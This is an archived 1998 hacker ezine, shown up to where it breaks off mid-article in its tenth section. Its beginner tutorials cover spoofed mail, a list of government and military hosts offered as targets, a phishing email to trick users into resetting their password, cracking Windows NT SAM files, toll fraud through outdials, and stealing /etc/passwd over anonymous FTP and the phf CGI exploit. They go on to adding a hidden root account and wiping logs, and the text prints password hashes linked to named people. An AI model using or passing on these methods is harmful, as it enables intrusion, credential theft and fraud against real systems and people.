💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › UHA › uha1-1.tx… captured on 2022-01-08 at 17:34:41.
⬅️ Previous capture (2021-12-05)
-=-=-=-=-=-=-
|---------------------------------------------------------------------------|
| -=[ United Hacker Association 1 - Magazine, Issue I ]=- |
| June 01, 1998 |
| E-Mail : uha1@gmx.net |
|---------------------------------------------------------------------------|
If you want you can add this text to your Homepage/BBS/Ftp/...
It's free, but please don't change anything without our permission!!
PLEASE USE THIS TEXT ON YOUR OWN RISK! WE ARE NOT RESPONSIBLE FOR ANYTHING!
Index :
1. A Guide To Anonymous Mail (by GhostHawk)
2. Ports (by GhostHawk)
3. Government Computer Systems (by GhostHawk)
4. Hacking Windows NT (by the file ripper)
5. How to get a persons IP (by Andreaz)
6. Hacking of TOL-Chat (by the file ripper)
7. Hacking of Yahoo-Chat (by Dave_Crash)
8. Hacking of VOL-Chat (by the hacking Cook)
9. How To Use Outdials (by AcidMeister)
10. Web Page Hacking For Newbies (by AcidMeister)
11. Some Relaying-Server (by the file ripper)
12. AOL-Gateways (by AcidMeister)
13. Trojaning (by the file ripper)
14. Programming Virii (by the file ripper)
15. XXX/Porno (by the file ripper)
If you want to publish one of your texts in our Magazine, just
mail us your text to : uha1@gmx.net (with subject line = UHA MAGAZINE),
we will review it and if it is a good one we will publish it.
Note : All texts are welcome.
You can write about everything you want, but it has to do something with
hacking/cracking/phreaking/carding/virii/computers ... -thanx-
--
We can manipulate you however we want.
We can read and change your personal datas.
We can take your identity.
Kill your existence.
We can come near to you from everywhere in the world.
You cann't escape!
-- (by the file ripper [UHA1])
!!IMPORTANT!!
If you have any questions, please don't mail us or the authors,
just go to http://www.uha1.com and post a message in our BBS!!!
!!IMPORTANT!!
Note : http://www.uha1.com (after the uha there is a ONE!)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1. A Guide To Anonymous Mail
by Ghost Hawk
GhostHawk@gmx.net
March 04, 1998
This is surprisingly easy. Sure you can download an anonymous e-mailer.
But thats no fun. In this file I will teach you how to do anonymous mail
by telneting into the server.
To anonymous mail someone fist off you have to telnet into a system on
port 25. Not all systems have port 25 open. I am going to use the
server i use the most as an example.
Ok first off i telnet into demonspawn.inna.net 25.
telnet demonspawn.inna.net
Trying 209.48.124.11...
Connected to demonspawn.inna.net.
Escape character is '^]'.
220 demonspawn.inna.net ESMTP Sendmail 8.7.5/8.7.3; Wed, 4 Mar 1998 17:36:34 -
0500
Ok, that meens i'm connected! Then you look at the server name. In this
case its demonspawn.inna.net. So i type the following.
"helo demonspawn.inna.net"
The server than returnes:
250 demonspawn.inna.net Hello yourhosthere.com [Your IP], pleased to meet you
Than you put who you want to make it from, by typing:
"MAIL FROM:BillGates@microsoft.com" You can put any e-mail you want it from!
The Server Returns:
250 BillGates@microsoft.com... Sender ok
You than put who you want to send it to.(i'm gonna use me as an example):
"RCPT TO:Ghosthawk@gmx.net"
The Server Returnes:
250 Recipient ok
After that you type:
"DATA"
Then the server says:
354 Enter mail, end with "." on a line by itself
Than all you have to do is type your message, than a "." and its sent! Easy!
Thats all for this file!!!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
2. Ports
by Ghost Hawk
GhostHawk@gmx.net
March 04, 1998
Describtion of Ports...
echo 7
discard 9
systat 11
daytime 13
netstat 15
qotd 17
chargen 19
ftp-data 20
ftp 21
telnet 23
smtp 25
time 37
rlp 39
name 42
whois 43
domain 53
nameserver 43
mtp 57
bootp 67
tftp 69
rje 77
finger 79
link 87
supdup 95
hostnames 101
iso-tsap 102
dictonary 103
x400 103
x400-snd 104
csnet-ns 105
pop 109
pop2 109
pop3 110
portmap 111
sunrpc 111
auth 113
sftp 115
path 117
uucp-path 117
nntp 119
ntp 123
nbname 137
nbdatagram 138
nbsession 139
news 144
sgmp 153
tcprepo 158
snmp 161
snmp-trap 162
print-srv 170
vmnet 175
load 315
vmnet0 400
systek 500
biff 512
exec 512
login 513
who 513
shell 514
syslog 514
printer 515
talk 517
ntalk 518
efs 520
route 520
timed 525
tempo 526
courier 530
conference 531
rvd-control 531
netnews 532
netwall 533
uucp 540
klogin 543
kshell 544
new-rwho 550
remotefs 556
remonitor 560
monitor 561
garcon 600
maitrd 601
busboy 602
acctmaster 700
acctslave 701
acct 702
acctlogin 703
acctprinter 704
elcsd 704
acctinfo 705
acctslave2 706
acctdisk 707
kerberos 750
kerbos-master 751
passwd-server 752
userreg-server 753
krb-prop 754
erlogin 888
kpop 1109
phone 1167
ingerslock 1524
maze 1666
nfs 2049
knetd 2053
eklogin 2105
rmt 5555
mtb 5556
man 9535
w 9536
mantst 9537
bnews 10000
rscs0 10000
queue 10001
rscs1 10001
poker 10002
rscs2 10002
gateway 10003
rscs3 10003
remp 10004
rscs4 10004
rscs5 10005
rscs6 10006
rscs7 10007
rscs8 10008
rscs9 10009
escsa 10010
rscsb 10011
qmaster 10012
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
3. Government Computer Systems
by Ghost Hawk
GhostHawk@gmx.net
March 04, 1998
I have made this file mainly for the newbie Hacker.
But it will also be a good reference for the Elite Hacker.
I'm gonna have a list of some really cool computers to Hack.
I also will have some really nice ways to get passwords for the comps.
Computer Addresses:
<Just telnet to the addresses>
<I dont recomend trying to hack the .gov and .mil addresses>
Government:
sundance.ll.nl.gov
ednet1.osl.or.gov
mecsys.mec.ohio.gov
ARD.FBI.GOV *FBI Main Computer*
Military:
hq.af.mil *American Air Force HEADquarters*
pentagon.mil *PENTAGON*
redstone.army.mil *Army*
wpgate.hqpacaf.af.mil *Area 51*
www.acc.af.mil
guam.andersen.af.mil
archive.afit.af.mil
www.hickamo.af.mil
cs1.langley.af.mil *CIA*
blackbird.afit.af.mil *American Nuclear agency*
dgis.dtic.dla.mil *D.O.D*
Nasa:
xfiles.gsfc.nasa.gov
phys.gsfc.nasa.gov
genesis.gsfc.nasa.gov
boris.gsfc.nasa.gov
plds3.gsfc.nasa.gov
nssdca.gsfc.nasa.gov
fdd.gsfc.nasa.gov
arioch.gsfc.nasa.gov
university.gsfc.nasa.gov
garc.gsfc.nasa.gov
pao.gsfc.nasa.gov
farside.gsfc.nasa.gov
Thats all I have for the computer adresses.
Nice Ways to Get Passwords!
Here are some ways that ive found over time to get passwords.
Annonymous FTP:
The most common way is to annonymously FTP into the server. Say you wanna
hack http://www.target.com you would ftp into ftp.target.com, then you
would get etc/passwd.
Get your password cracker out and crack the password. If its shadowed
you gotta problem. Shadowed passwords are where theres a * instead of
a password.
Annonymous E-Mail:
I neat little way i stumbled upon is to annonymous E-Mail them.
Works everytime, if their stupid. All you do is find out their ISP.
Its really easy. If their E-mail is loser@killme.com you would E-Mail them
using the E-Mail, root@killme.com, or maybe sysadmin@killme.com.
Then you say the following:
Mail from : root@killme.com
Mail to : loser@killme.com
Message :
Dear Mr. Loser,
There has been a successful Hack attempt on your account.
If you would like this problem fixed please change your password
to "demo3".
Thank You For Using Kill Me Internet.
End Message!
BOOM!! Instant password. That works on all kinds of of systems,
shell accounts, webpages, anything!
Social Enginnering:
I think this way is kind of funny. There are a lot of different
Social Engineering methods. I will only discuss one way. I found
this method and thought it was cool. What you do is you call up where
the computer is hosted. You get a username that you found from it and
pretend to be a girl. Normally the guys running these computers have
no life and only see the sun 5 minutes a day, so they will love a girl.
Tell them in a real sexual way that you would like to get your password
changed to whatever, normaly those guys will do anything for a girl.
Kinda lame but you might be able to use it as a last resort.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
4. Hacking Windows NT
by the file ripper
tfr@gmx.net
March 19, 1998
Okay, in this text I will shortly describe you a very easy way
how to hack a local Windows NT System. I write this text because I think
Micro$oft really sucks!
First check the system you want to hack...
I mean look at it, and check if you can boot with a Boot-Disk.
If you are able to boot from a Bootdisk, then all is no problem.
Once you are in the Dos-prompt (like "A:\>"), try to access c: by
typing in "C:". If this works, copy the "SAM."-file from the
directory "winnt\system\config" (if it's not located there, search
for it, with the dos-command : "dir /s sam. /a")
If you have no access to c:, then try a program called "NTFSDOS"
It gives you access on NTFS partions! It's really good. You are not logged!
But you also have only read-access.
Ok. After you got the file, get l0phtcrack from www.l0pht.com
Start L0phtcrack... File - Import SAM-File ... happy cracking!
Oh yeah... if the Bootdisk-trick don't works :
Log into the system like normal. If you don't have a username/password,
try to get in through the guest account. Just kill the CMOS (bios)
(because most of the time, the BIOS password is set, if it is you can
enter the BIOS without entering a password you don't need to kill
the CMOS!)
So you can de-lock the disk-lock!
Then restart your computer and re-setup the bios...
Don't forget : Bootsequenz should be : "A,C" (means, it first checks the
disk-drive for a bootable system)
Then work like said in the text above ...
A Other way :
Log in into the system, and get the "SAM._" file of the "winnt/repair"
directory. Before you can crack it, use :
"expand sam._ sam." (because it's compressed...)
Okay, then run l0phtcrack. If Service Pack 3 is installed this won't
work and you have to use the way as I said above.
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
5. How to get a persons IP:
>>>>>>--Andreaz--<<<<<<
E-mail: andreaz@hehe.com
March 21, 1998
1. *****Dummy*****
Ask the person for his IP.
2. ****E-mail****
Ask for the victim to send you an e-mail. When you have got the mail
look at the properties, there you can find the IP.
3. ****ICQ-way****
If you and the victim has ICQ then you can se his IP.
Click on the nick, and the choose info. There does the IP stand.
But sometimes has the person choosen not to show his IP, but
for this only use the old ICQ-client, then you will see the
IP as well, or just download a ICQ-sniffer.
4. ****IRC-way****
If you are on IRC, then type "/dns nick".
5. *****Trace*****
The easiest way is though to use an "IP-Tracer"
6. *****Guestbook***** (by the file ripper)
Ask him to sign your GuestBook. (It saves the IP!)
At www.lpage.com you can get a free guestbook.
7. *****Homepage***** (by the file ripper)
Ask him to go to your homepage.
There you add a automatically opening link, for advertisment.
The advertisment Server also will save the IP...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
6. Hacking of TOL-Chat
by the file ripper
tfr@gmx.net
March 23, 1998
Okay, I don't think anybody of you knows the TOL-Chat, because this
chat is only for Tyroleans (Austria). But it's a good example for a
"secure" ;) cgi-chat. Like you know cgi ist a Common Gateway Interface.
That means, everyone has read-write-delete... access.
Everytime you write a message in the chat, you write it in a cgi-file.
A CGI-URL looks like this (of TOL)
http://www.tirol.com/Cgi-bin/chat_mainframe_rel.cgi?Spitz=Fucker
That means you only have to change then name after Spitz.
In this case you are chatter "Fucker". If you change "Fucker" to
"Hallo", then you are chatter "Hallo" and you can get all the messages
which are only for him, and you also can write messages, and everyone
will think he wrote it... That's a too simple thing :)
I know this is not hacking, but enjoy!
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
7. Hacking of Yahoo-Chat
by Dave Crash
crash_dave_1997@yahoo.com
March 19, 1998
Okay, Dave_Crash found out a nice trick on the Yahoo-Chat, but he had
not the time to write a text about it, so I (the file ripper) will write
it for him.
First, Telnet into r2.chat.yahoo.com 4700
Note : r1-r12 are the chatservers.
Now it should ask you for a username and a password.
Type in "guest". It will let you in. Now you will see a couple of
messages scrolling down and down ...
It's like you are yourself in the chatroom, but you cann't write any
messages and cann't be "seen" by other chatters.
But that's not the thing we wanted...
Try typing in : "kick <chatter>".
You just kicked a chatter :). That's a nice trick.
You don't even need to be SuperUser or something like this, just kick
them out from the guestaccount *LOL*
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
8. Hacking VOL-Chat
by the hacking cook
Controlio@hotmail.com
May 20, 1998
Okay, I'am sure you don't know the Austria Online chat...it's a chat
from a provider in Austria...(go to: www.vol.at and there on chat)
But it's a good example for a HTML chat, and how to change your name there!
First you download the HTML-code of the chat (the part, where you can enter
your messages,... not the part where the messegas can be read)!
If you have done this, open the HTML-code in Notepad, so, now scroll to
the end of the text and there is a line:
<INPUT TYPE="hidden" NAME="nick" VALUE="HORNY">
so, now you are "HORNY" you only change the name, load the HTML again, and
are this chatter if u become a nother hacker load the HTML in your editor
and change the name, and load it again....
Dont get confused, if there stands "hacked" this isn't
your username!
I know, this is not realy hacking, but, I think it's
fun...so enjoy
If you dont want to register you (you must register you, to become a password
and so on) here is the complete HTML:
<HTML>
<HEAD>
</HEAD>
<SCRIPT LANGUAGE=JavaScript>
function resetinput(form) {
form.submit();
form.mess.value="";
form.mess.focus();
form.mess.select();
return (false);
}
</SCRIPT>
<BODY BGCOLOR="#ffffff">
<form ACTION=http://chatix1.tele.net/scripts/chatnt/chatoutput.pl METHOD=GET TARGET=entries onSubmit="return resetinput(this)"><input type=hidden name="METHOD" value="GET"><input type=hidden name="TARGET" value="entries"><input type=hidden name="onSubmit"
<TT>Spitzname: <STRONG>hacked</STRONG></TT>
Meldungen: <SELECT NAME="anzahl">
<OPTION VALUE=5>5</OPTION>
<OPTION VALUE=6>6</OPTION>
<OPTION VALUE=7>7</OPTION>
<OPTION VALUE=8>8</OPTION>
<OPTION VALUE=9>9</OPTION>
<OPTION VALUE=10>10</OPTION>
<OPTION VALUE=11>11</OPTION>
<OPTION VALUE=12>12</OPTION>
<OPTION VALUE=13>13</OPTION>
<OPTION VALUE=14>14</OPTION>
<OPTION VALUE=15 SELECTED>15</OPTION>
<OPTION VALUE=16>16</OPTION>
<OPTION VALUE=17>17</OPTION>
<OPTION VALUE=18>18</OPTION>
<OPTION VALUE=19>19</OPTION>
<OPTION VALUE=20>20</OPTION>
<OPTION VALUE=21>21</OPTION>
<OPTION VALUE=22>22</OPTION>
<OPTION VALUE=23>23</OPTION>
<OPTION VALUE=24>24</OPTION>
<OPTION VALUE=25>25</OPTION>
<OPTION VALUE=26>26</OPTION>
<OPTION VALUE=27>27</OPTION>
<OPTION VALUE=28>28</OPTION>
<OPTION VALUE=29>29</OPTION>
<OPTION VALUE=30>30</OPTION>
</SELECT>
Chatraum: <SELECT NAME="raum">
<OPTION VALUE=1 SELECTED>Entree</OPTION>
<OPTION VALUE=2>Lobby</OPTION>
<OPTION VALUE=3>Carinthia</OPTION>
<OPTION VALUE=4>Niederösterreich</OPTION>
<OPTION VALUE=5>Oberösterreich</OPTION>
<OPTION VALUE=6>Styria</OPTION>
<OPTION VALUE=7>Vienna</OPTION>
<OPTION VALUE=8>Vorarlberg</OPTION>
<OPTION VALUE=9>Zürich</OPTION>
<OPTION VALUE=10>Rheintal</OPTION>
<OPTION VALUE=11>Liechtenstein</OPTION>
<OPTION VALUE=12>Südtirol</OPTION>
</SELECT>
<INPUT TYPE="hidden" NAME="nick" VALUE="HORNY">
<INPUT TYPE="hidden" NAME="cfg" VALUE="volchat">
<BR CLEAR=LEFT><TT>Meldung : <INPUT TYPE="text" NAME="mess" VALUE="" SIZE=30 MAXLENGTH=150><INPUT TYPE="submit" VALUE="Senden!"></TT></FORM>
Erscheint die Meldung "Transfer interrupted", bitte auf Reload klicken.
</BODY>
</HTML>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
9. How To Use Outdials
by AcidMeister
warming@vol.com
This file is for folks who want to get started using outdials. I tried to
explain everything in detail, assuming no prior knowledge. Have phun.
I have used a lot of information obtained from other g-files in putting
together this file.
Introduction: Outdials
~~~~~~~~~~~~~~~~~~~~~~
Outdials are extremely useful things which can be used to call long
distance without paying and without using codes. Essentially, an
outdial is a modem which is connected to a network. You call up the
network, then connect to the outdial over the network, then use the modem
to call whatever system (BBS) you want to connect to. Sounds
complicated, but it really isn't.
You will be using modems which are connected to the Telenet network. There
are outdials connected to Telenet in every area code. So, you can call
just about anywhere you want. The problem is that generally, these outdials
don't take collect connections over Telenet. So, we have to use a way of
getting around that. That way is called PAC*IT. PAC*IT is a service
which is connected to Telenet.
Part I - Connecting to the Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ok, first you need to connect to the network. The way to connect
to Telenet in order to use these outdials is through Pac*it, which is
some sort of gay PC pursuit deal. Anyway, call Pac*it: 1-800-234-2796
at 2400/1200 7E1. After connecting, log on:
1200 baud: just hit <cr> a couple of times
2400 baud: send an @ (shift-2) then a <cr>
It will now say
PAC*IT Plus
XXXXXXXXXXX111
The X's don't matter, what matters is the last three digits. You can only
connect to U.S. modems if this number is between 100 and 300. If the
three numbers on the end aren't between 100 and 300 then hang up and call
back. Eventually, you will get one that is OK.
Under the numbers it will say: 'TERMINAL =' just hit return here.
You will now see the well known '@' prompt. This means you are
connected to Telenet.
Part II - Connecting to the Outdial
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Now, you need to know a bit about the way
systems on Telenet are addressed. To connect to a system (i.e. outdial)
at the '@' prompt, you type the address of the system you want and hit
return. You must use the Telenet International Address Format to
connect to outdials if you called in through PAC*IT. It looks like
this:
|------------------------ Data Network Ident. Code (DNIC)
|
| |----------------- Area code
| |
| | |----------- DTE address (the specific system in the
/\ | / \ area code)
/ \ / \ / \ /\----- Port Address
IIII AAA NNNNN PP
For example the Telenet address of 201 346 becomes 31102010034600
So, connect to the outdial in the area code you want by typing in the complete
address of the outdial. I know, you are saying to yourself "Where the
hell do I get addresses of outdials?" Well, at the end of this g-file,
of course.
After you have entered the address, you will get a 'CONNECTED' or else
some error message. If you get an error, try again, or try another
outdial.
Part III - Using the Outdial
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After you connect, hit ctrl-E a few times, then hit return. After a few
seconds you should get a message like '*Hello, I'm Ready*' You are now
connected to a modem! Help is available, just enter a ? or H. The
command you are most concerned with is D (dial command). So, enter D
and it should ask you for the number. Just type in the phone number
you want to dial (no area code). It should then say "Dialing..." If
you connect, great, you should know what to do now. If the number is
busy, or out-of-order or whatever, the outdial will return to command
mode. You can then dial again.
You can generally disconnect from the outdial itself by entering an '@'
then hitting return in the command mode. You should then get the '@'
prompt back. Now you can connect to another outdial in a different area
code if you want to. Just follow the procedure in Part II again.
Part IV - Outdial Addresses
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Area Area
code Baud Address code Baud Address
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NJNEW 300: 311020100001 CAOAK 300: 311041500005
1200: 311020100301 1200: 311041500216
2400: 311020100022 2400: 311041500011
DCWAS 300: 311020200115 CAPAL 300: 311041500106
1200: 311020200116 1200: 311041500224
2400: 311020200117 2400: <NONE>
CTHAR 300: <NONE> CASFA 300: 311041500215
1200: 311020300120 1200: 311041500217
2400: <NONE> 2400: 311041500023
WASEA 300: 311020600017 ORPOR 300: 311050300020
1200: 311020600019 1200: 311050300021
2400: 311020600021 2400: <NONE>
NYNYO 300: 311021200315 AZPHO 300: 311060200022
1200: 311021200316 1200: 311060200023
2400: 311021200028 2400: 311060200026
CALAN 300: 311021300412 MNMIN 300: 311061200120
1200: 311021300413 1200: 311061200121
2400: 311021300023 2400: 311061200022
TXDAL 300: 311021400117 MABOS 300: 311061700311
1200: 311021400118 1200: 311061700313
2400: 311021400022 2400: 311061700026
PAPHI 300: 311021500112 TXHOU 300: 311071300113
1200: 311021500005 1200: 311071300114
2400: 311021500022 2400: 311071300024
OHCLE 300: 311021600020 CACOL 300: 311071400023
1200: 311021600021 1200: 311071400004
2400: 311021600120 2400: 311071400024
CODEN 300: 311030300114 CASAN 300: 311071400119
1200: 311030300115 1200: 311071400213
2400: 311030300021 2400: 311071400124
FLMIA 300: 311030500120 CASDI 300: 311071400102
1200: 311030500121 (619) 1200: 311071400210
2400: 311030500122 2400: 311071400121
ILCHI 300: 311031200410 UTSLC 300: 311080100020
1200: 311031200411 1200: 311080100021
2400: 311031200024 2400: 311080100012
MIDET 300: 311031300214 FLTAM 300: 311081300020
1200: 311031300216 1200: 311081300021
2400: 311031300024 2400: 311081300124
MOSLO 300: 311031400005 MOKCI 300: 311081600104
1200: 311031400421 1200: 311081600221
2400: 311031400020 2400: 311081600113
GAATL 300: 311040400113 CAGLE 300
1200: 311040400114 1200: 311081800021
2400: 311040400022 2400
CASJO 300: 311040800111 CASAC 300: 311091600007
1200: 311040800021 1200: 311091600011
2400: 311040800110 2400: 311091600012
WIMIL 300: 311041400020 NCRTP 300: 311091900020
1200: 311041400021 1200: 311091900021
2400: 311041400120 2400: 311091900124
Part V - Finishing Up
~~~~~~~~~~~~~~~~~~~~~
As best I can tell, this is a very safe method if you don't abuse it,
over use it, etc. Remember, this is a 1-800 number, so if you call it
200 times in a week or 30 times in a day, you may get a call yourself.
So, to keep this method alive for everyone to use, don't do this too
much.
I hope this file has been helpful to you. There are plenty of people
who know a lot more about this stuff than I do. But, I will definitely
try to help anyone out if I can.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
10. Web Page Hacking For Newbies
by AcidMeister
warming@vol.com
December 30, 1997
First of all you will need an ftp program such as ws_ftp. I use Voyager FTP
downloadable at http://www.windows95.com it's real simple and easy to use,
so try it if you haven't dealt with ftp before. Now once you have the
program find an address like http://www.shiga-pc.ac.jp you can find
addresses like this by going to a search engine such as AltaVista and
running a search for url:ac.jp this tells the search engine to give you
all the academic addresses in Japan ex. ac=academic jp=Japan , you can
try this with any country ex. url:dk . But for now let's just focus on
the Japanese servers. When u have an address (I would recommend making a
list of about 100 and trying them all) go to your ftp program and type in
the address ex. http://www.shiga-pc.ac.jp note.. You will have to log in
anonymously. You should then get a list of folders on the remote system
usr, pub,etc, dev, bin. See the etc folder? open it, once opened you should
see some files passwd and group, open or view the file passwd (this is where
the passwords for the system are stored), you should hopefully get something
that looks like this.
root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:
uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
sso:Nologin:6:7:System Security Officer:/etc/security:
news:Nologin:8:8:USENET News System:/usr/spool/netnews:
sccs:PASSWORD HERE:9:10:Source Code Control:/:
ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh
rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
jgordon:w4735loqb8F5I:275:15:James."Tiger" Gordon:/usr/email/users/jgordon:/bin/csh
lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh
erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh
dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh
This means you've hit the jackpot, in this case you should get a password
cracker download one at (http://www.hackersweb.com go to the hacking toolz
section), I would recommend for the beginning hacker to get a password
cracker such as killer cracker because it's extremely easy to use. Once you
have downloaded killer cracker you will need a dictionary file
(get one at http://www.hackersweb.com look in the extra toolz section),
dictionary filez are better the bigger they are so I would recommend
getting one at around 10 MB or more. Now the passwords from the passwd
file off the server you are hacking, you will need to save them to a file
and place them in the same directory as Killer Cracker, you will also need
to have your dictionary file in the same directory. Now you are ready to
go, just run killer cracker and tell it the name of the Pwfile=the password
file and the name of the word file=your dictionary file, the valid file will
be the file where the output of the password cracker will be put just give
it a name such as crack.txt. Once the cracker is done cracking the password
files for you goto the valid file and take a look the file should look
something like this root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember this is an example). This file says that the username is root
and the password is root if the file had been like this.
root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember again just an example) the login or username would be root and
the password would be dumbass, well that's it just ftp to the site using
the login and password. Note if you get root type in the following once
you have logged in:- echo "myserver::0:0:Test User:/:/bin/csh">>etc\passwd
this will allow you to login to the server with 1:myserver so you
get the admin suspicious when they see people login as root. Hide yourself
as much as possible, if you already have a shell then go through that first
when loggin on, or telnet to the hacked site shell and then re-telnet to the
hacked shell using the hacked shell, if you see what I mean, so your who
appears as local host. Also get some c scripts which delete your presence,
erases you off logs etc
Now if you were not as lucky to get exactly the same password file as shown
in the example above then maybe you got something like this.
root:*:0:1:Operator:/:
ftp:*:53:53:anonymous ftp:/pub:
t2:*:201:201:Takaoka Tadashi:/pub:
This means that the passwd file is shadowed, if this is the case then
welcome to the administrators world of trying to stop hackers, this is
where you cant really do anything. However there is one thing to do
sometimes in very rare cases there may be a folder on the remote system
that can be accessed by an anonymous login called shadowed, shadow, or
secret if this is the case the password files should be in there,
congratulations. If there isn't a folder like this, and the passwd file
is shadowed then bad luck, go to the next address on your list.
Now that you have tried the first thing as shown above there are a couple
of other methods you may also want to try one is FTP hacking shown below
Go to a dos prompt after you are connected to the internet .
Type.
ftp www.victim=the site address
server will ask for a username press enter
server will ask for a password press enter
at the prompt type quote user ftp
then type
quote cwd ~root
then type
quote pass ftp
If you get in make sure you delete the log file they might look at it and
see that you were on. Once you get on the passwd file is in etc/passwd so
type cd etc then type get passwd. If you have done the above right and the
server is old you will have root access. By the way root is the highest
security status you can have.
Another good way of getting root or a shell at least is through browser
hacking. Again well use Japanese educational servers as our target. To do
this you will need a browser such as Netscape or Internet Explorer, you
will also need a telnet program, you can either download a telnet program
at http://www.windows95.com or use the one that already comes with dos.
To access the telnet program that comes with dos go to your dos windows and
type in telnet www.site.com the site.com stand for the site you want to
telnet to, it could be anything like www.geidai.ac.jp or
www.tulips.tsukuba.ac.jp . You will also need a cracker program I would
recommend using Killer Cracker and applying as above.
Next thing you do is open your browser and run a search for url:ac.jp ,
like explained above. Again I would recommend making a big list of your
targets. Now when you have your targets we address type it in your browser
and add this to it
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
or
http://www.webpage.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
To all you out there who are slightly advanced, I know this is the phf
technique and it is virtually dead, but you'll be surprised where you can
use this.
This technique of finding the password file was first used in November 1996
on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
servers, so this won't work on something like www.nasa.gov or most of the
www.*.com sites. But still works on many university servers outside Europe
and the U.S.
O.K. Once the url is entered you will see a number of things:-
Error 404
Cgi-bin/phf is not found on this server (the most common one)
Or
Warning
You do not have permission to view cgi-bin/phf?/ on this server
There are a number of other things the server might say, but the thing you
want it to say is this:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:fdn7:3:3:0000-Admin(0000):/:
adm:dehf6:4:4:0000-Admin(0000):/var/adm:
wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
smtp:cmvof:0:0:mail daemon user:/:
uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:eoend:37:4:Network Admin:/usr/net/nls:
nobody:ccvjcvj:60001:60001:uid no b
etc
This means you have hit the jackpot!!!
If you get something similar to this but all lines have something in common
like the following:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/bin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
wnn:x:5:5:0000-Admin(0000):/var/adm:
news:x:6:6:0000-Admin(0000):/usr/lib/news:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
